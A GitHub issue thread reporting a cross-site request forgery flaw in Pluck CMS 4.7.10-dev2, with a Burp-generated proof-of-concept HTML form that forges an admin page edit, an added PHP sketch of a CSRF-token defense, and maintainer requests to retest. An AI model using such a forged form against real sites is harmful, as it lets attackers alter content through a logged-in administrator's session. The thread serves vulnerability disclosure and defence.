An issue was discovered in Pluck 4.7.10-dev2. There is a CSRF vulnerability that can editpage via a /admin.php?action=editpage
F1sh1001 opened this issue
CSRF POC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/pluck/admin.php?action=editpage&page=111" method="POST">
<input type="hidden" name="title" value="evil" />
<input type="hidden" name="seo_name" value="111" />
<input type="hidden" name="content" value="evil" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="keywords" value="" />
<input type="hidden" name="hidden" value="no" />
<input type="hidden" name="sub_page" value="" />
<input type="hidden" name="theme" value="oldstyle" />
<input type="hidden" name="save" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
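The form in the PoC above carries only fields whose values can be fixed in advance, so the usual server-side defense is a per-session synchronizer token that a cross-site page cannot read. The sketch below is an added example, not part of the original post and not Pluck's own code; every function name and the `csrf_token` field name are hypothetical, and the session and POST arrays are constructed sample data.

```php
<?php
// Added example, not Pluck code: synchronizer-token check for a state-changing
// admin POST such as admin.php?action=editpage. Function names are hypothetical.

// Return the per-session token, creating it on first use.
function csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hidden field to embed in the edit-page form the admin panel renders.
function csrf_field(array &$session): string {
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token($session), ENT_QUOTES) . '" />';
}

// True only when the request carries the token bound to this session.
// is_string() guards against csrf_token[]=x, which would make hash_equals() throw.
function csrf_check(array $session, array $post): bool {
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($supplied) && $expected !== ''
        && hash_equals($expected, $supplied);   // constant-time comparison
}

// Gate for the save handler: reject before any page data is written.
function handle_editpage(array $session, array $post): string {
    if (!isset($post['save'])) {
        return 'form not submitted';
    }
    if (!csrf_check($session, $post)) {
        return '403 rejected: missing or invalid CSRF token';
    }
    return 'page saved';   // a real handler would write the page here
}

// Constructed sample data: an admin session and two POST bodies.
$session = [];
$form    = csrf_field($session);   // what the admin's own edit form would contain
$forged  = ['title' => 'evil', 'content' => 'evil', 'save' => 'Save'];
$genuine = $forged + ['csrf_token' => $session['csrf_token']];

echo handle_editpage($session, $forged), PHP_EOL;   // body shaped like the PoC form
echo handle_editpage($session, $genuine), PHP_EOL;  // body from the rendered admin form
```

In a web request the same functions would be called with `$_SESSION` and `$_POST` after `session_start()`.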
Where did you insert the script?? It is JavaScript, so it only resides in the client.
The /h1 will not appear in the file on disk.
Please explain more.
Could you please test the latest dev release 4.7.10-dev4?
https://github.com/pluck-cms/pluck/releases/tag/4.7.10-dev4
Have you retested with the latest dev version?
Sorry, I don't have much time. I'll try if I have time
…------------------ Original Message ------------------
From: "Bas Steelooper"<notifications@github.com>;
Sent: Tuesday, October 22, 2019, 3:19 PM
To: "pluck-cms/pluck"<pluck@noreply.github.com>;
Cc: "1113402387"<1113402387@qq.com>; "Author"<author@noreply.github.com>;
Subject: Re: [pluck-cms/pluck] An issue was discovered in Pluck 4.7.10-dev2. There is a CSRF vulnerability that can editpage via a /admin.php?action=editpage (#81)
Have you retested with the latest dev version?